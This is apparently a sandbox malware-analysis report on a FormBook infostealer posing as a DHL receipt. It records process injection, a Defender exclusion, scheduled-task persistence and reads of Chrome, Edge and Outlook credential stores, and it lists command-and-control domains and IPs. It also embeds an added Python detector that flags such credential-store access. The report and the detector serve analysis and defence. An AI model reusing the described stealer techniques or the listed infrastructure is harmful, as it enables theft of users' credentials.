                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeQueries volume information: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

Source: Yara match | File source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000013.00000002.4206977090.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1997895215.00000000014A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.4209611684.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.4208156839.00000000041C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1996643989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2004019150.0000000001A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.4207191242.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.4208178305.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
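The accesses listed above are the detection-worthy pattern in this section: a Windows system binary (EhStorAuthn.exe, which the injected FormBook payload is running inside) reads the Chromium credential stores of Chrome and Edge (Login Data, Cookies, Web Data, Local State) and opens the Outlook MAPI profile key. The Python below is an added example and is not part of the Joe Sandbox report or of any tooling it describes: it parses events in the report's own "Source: <image> File opened: <path>" / "Key opened: <key>" line format and flags any process that is not a browser or mail client touching those stores. The sample events are constructed copies of the entries above plus two benign controls, and the allow-list of expected image names is an assumption to tune per environment.

```python
"""Flag credential-store reads by processes that are not browsers or mail clients.

Added example (not from the Joe Sandbox report). Input lines follow the report's
"Source: <image> File opened: <path>" / "Key opened: <key>" format; the sample
events below are constructed copies of the report's entries plus two benign controls.
"""
import re
from collections import Counter
from typing import NamedTuple

# Credential-bearing files inside a Chromium "User Data" profile (Chrome, Edge and
# Brave share the layout). The report shows all four being opened by EhStorAuthn.exe.
CHROMIUM_CRED_FILES = {"login data", "cookies", "web data", "local state"}
CHROMIUM_PROFILE_RE = re.compile(r"\\user data\\", re.I)

# MAPI profile store read by stealers to recover saved Outlook account credentials.
OUTLOOK_PROFILE_RE = re.compile(r"\\windows messaging subsystem\\profiles(\\|$)", re.I)

# Image names expected to open these stores (assumed allow-list; tune per environment).
# A system binary such as EhStorAuthn.exe is not on it, which is exactly the report's case.
EXPECTED_IMAGES = {"chrome.exe", "msedge.exe", "brave.exe", "outlook.exe"}

# Accepts the report's fused form ("...exeFile opened:") as well as a spaced one.
EVENT_RE = re.compile(
    r"^\s*(?:Source:\s*)?(?P<image>.+?\.exe)\s*(?P<action>File opened|Key opened):\s*(?P<target>.+?)\s*$",
    re.I,
)


class Finding(NamedTuple):
    image: str   # full path of the process that performed the access
    kind: str    # "chromium-credential-file" or "outlook-profile-key"
    target: str  # file or registry path that was opened


def _basename(path):
    """Last path component, lower-cased, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(action, target):
    """Return which sensitive store the target belongs to, or None if it is not one."""
    action = action.lower()
    if action == "file opened":
        if _basename(target) in CHROMIUM_CRED_FILES and CHROMIUM_PROFILE_RE.search(target):
            return "chromium-credential-file"
    elif action == "key opened":
        if OUTLOOK_PROFILE_RE.search(target):
            return "outlook-profile-key"
    return None


def scan(lines):
    """Return one Finding per sensitive-store access by a process not on the allow-list."""
    findings = []
    for line in lines:
        m = EVENT_RE.match(line)
        if not m:
            continue  # not a file/key open event
        kind = classify(m.group("action"), m.group("target"))
        if kind is None or _basename(m.group("image")) in EXPECTED_IMAGES:
            continue  # harmless target, or the browser/mail client reading its own store
        findings.append(Finding(m.group("image"), kind, m.group("target")))
    return findings


def summarize(findings):
    """Accesses per offending image, so one stealer surfaces as a single alert."""
    return dict(Counter(f.image for f in findings))


# Constructed sample: the eight file opens and the registry key from the report, then
# two benign controls (Chrome reading its own Login Data; an unrelated .mui open).
SAMPLE_EVENTS = [
    r"Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies",
    r"Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies",
    r"Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies",
    r"Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data",
    r"Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State",
    r"Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State",
    r"Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data",
    "Source: C:\\Windows\\SysWOW64\\EhStorAuthn.exeKey opened: HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\",
    r"Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Windows\System32\en-US\EhStorAuthn.exe.mui",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.kind:26} {f.image} -> {f.target}")
    print(summarize(scan(SAMPLE_EVENTS)))
```

Run against the constructed sample, the nine EhStorAuthn.exe accesses are reported and the two controls are not; on real telemetry (Sysmon Event ID 11/12 or an EDR file-access feed) the same `classify`/`scan` logic applies once the events are rendered in this line format, and the allow-list should be keyed on signed image path rather than bare file name to resist masquerading.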

                Remote Access Functionality

Source: Yara match | File source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000013.00000002.4206977090.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1997895215.00000000014A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.4209611684.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.4208156839.00000000041C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1996643989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2004019150.0000000001A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.4207191242.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.4208178305.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Mitre Att&ck Matrix

Techniques observed in this analysis carry the number of report findings mapped to them in brackets; techniques without a number are the remaining cells of the matrix and were not observed.

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology, IP Addresses
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising, Compromise Infrastructure
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise
Execution: Scheduled Task/Job [1], Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter, PowerShell
Persistence: Scheduled Task/Job [1], DLL Side-Loading [1], Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron
Privilege Escalation: Process Injection [612], Scheduled Task/Job [1], Abuse Elevation Control Mechanism [1], DLL Side-Loading [1], Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron
Defense Evasion: Masquerading [1], Disable or Modify Tools [11], Virtualization/Sandbox Evasion [41], Process Injection [612], Deobfuscate/Decode Files or Information [1], Abuse Elevation Control Mechanism [1], Obfuscated Files or Information [3], Software Packing [12], Timestomp [1], DLL Side-Loading [1]
Credential Access: OS Credential Dumping [1], LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing
Discovery: Security Software Discovery [221], Process Discovery [2], Virtualization/Sandbox Evasion [41], Application Window Discovery [1], File and Directory Discovery [1], System Information Discovery [113], Remote System Discovery, System Owner/User Discovery, Network Sniffing, Network Service Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections, Shared Webroot
Collection: Email Collection [1], Archive Collected Data [1], Data from Local System [1], Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging
Command and Control: Encrypted Channel [1], Ingress Tool Transfer [3], Non-Application Layer Protocol [4], Application Layer Protocol [4], Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement, External Defacement
Behavior Graph (ID: 1629832; sample: DHL AWB Receipt_pdf.bat.exe; start date: 05/03/2025; architecture: WINDOWS; score: 100)

Start node (2)
  DNS/IP: www.usastakes.xyz; www.031233435.xyz; 17 other IPs or domains
  Signatures: Sigma detected: Scheduled temp file as task from temp location; Multi AV Scanner detection for submitted file; Yara detected FormBook; 7 other signatures; Performs DNS queries to domains with low reputation (www.031233435.xyz)

  DHL AWB Receipt_pdf.bat.exe 7 (node 10) started
    Dropped: C:\Users\user\AppData\...\AYBPplggzXaXav.exe (PE32); C:\...\AYBPplggzXaXav.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmp99C5.tmp (XML); C:\Users\...\DHL AWB Receipt_pdf.bat.exe.log (ASCII)
    Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Adds a directory exclusion to Windows Defender
    RegSvcs.exe (node 16) started
      Signatures: Maps a DLL or memory area into another process
      CLaoxM16clnn.exe (node 29) injected
        Signatures: Found direct / indirect Syscall (likely to bypass EDR)
        EhStorAuthn.exe (node 42) started
          Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
          CLaoxM16clnn.exe (node 45) injected
            DNS/IP: 031233435.xyz 144.76.229.203, ports 49860, 49882, 49902 (HETZNER-AS, DE, Germany); www.publicblockchain.xyz 13.248.169.48, ports 50052, 50053, 50054 (AMAZON-02, US, United States); 10 other IPs or domains
            Signatures: Found direct / indirect Syscall (likely to bypass EDR)
          firefox.exe (node 49) started
    powershell.exe 23 (node 19) started
      Signatures: Loading BitLocker PowerShell Module
      WmiPrvSE.exe (node 32) started
      conhost.exe (node 34) started
    powershell.exe 23 (node 21) started
      conhost.exe (node 36) started
    schtasks.exe 1 (node 23) started
      conhost.exe (node 38) started

  AYBPplggzXaXav.exe 5 (node 14) started
    Signatures: Multi AV Scanner detection for dropped file; Injects a PE file into a foreign processes
    schtasks.exe 1 (node 25) started
      conhost.exe (node 40) started
    RegSvcs.exe (node 27) started
